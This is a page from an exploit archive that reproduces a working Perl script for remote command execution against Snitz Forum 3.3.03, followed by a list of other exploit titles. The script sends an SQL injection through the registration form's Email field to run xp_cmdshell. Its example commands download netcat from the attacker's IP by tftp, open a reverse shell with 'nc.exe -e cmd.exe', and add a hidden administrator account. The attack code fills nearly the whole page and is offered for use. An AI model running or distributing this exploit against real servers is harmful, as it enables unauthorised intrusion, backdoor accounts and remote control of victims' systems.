exploits , vulnerabilities , articles , Snitz Forum 3.3.03 Remote Command Execution Exploit

2003-05-12

Snitz Forum 3.3.03 Remote Command Execution Exploit

#!/usr/bin/perl

use Socket;

print "\nRemote command execution against Snitz Forums 3.3.03 (and
probably others).\n";
print "You accept full responsibility for your actions by using this
script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";

print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
$webserver = "www.enterthegame.com";
}

print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
$port = 80;
}

print "\nAbsolute path to \"register.asp\"?
[/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
$path = "/forum/register.asp";
}

print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here
YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r
/add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
$command =~ s/\ /\%20/g;

if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
print "Error connecting to $webserver\n";
exit( 0 );
}
else
{
my $data1 = $path . "\?mode\=DoIt";
my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" .
$command. 
"\'\%20--\&Name\=snitz";
my $length = length( $data2 );

print FILEHANDLE "POST $data1 HTTP/1.1\n";
if( $port == 80 )
{
print FILEHANDLE "Host: $webserver\n";
}
else
{
print FILEHANDLE "Host: $webserver:$port\n";
}
print FILEHANDLE "Accept: */*\n";
print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.0)\n";
print FILEHANDLE "Keep-Alive: 300\n";
print FILEHANDLE "Referer:
http:\/\/$webserver$path\?mode\=Register\n";
print FILEHANDLE "Content-Type:
application/x-www-form-urlencoded\n";
print FILEHANDLE "Content-Length: $length\n\n";
print FILEHANDLE "$data2";

print "\nSQL injection command sent. If you are waiting for a shell
on your listening\n";
print "netcat, hit \"enter\" a couple of times to be
safe.\n\n";

close( FILEHANDLE );
}

sub open_TCP
{
my( $FS, $dest, $port ) = @_;

my $proto = getprotobyname( 'tcp' );
socket( $FS, PF_INET, SOCK_STREAM, $proto );
my $sin = sockaddr_in( $port, inet_aton( $dest ));
connect( $FS, $sin ) || return undef;

my $old_fh = select( $FS );
$| = 1;
select( $old_fh );
return 1;
}


securitydot.net - 2003-05-12

Exploits - newest 10 RSS | More

2007-06-15 57270 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34201 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42419 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29329 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19769 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16706 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19404 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16590 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33606 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17231 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit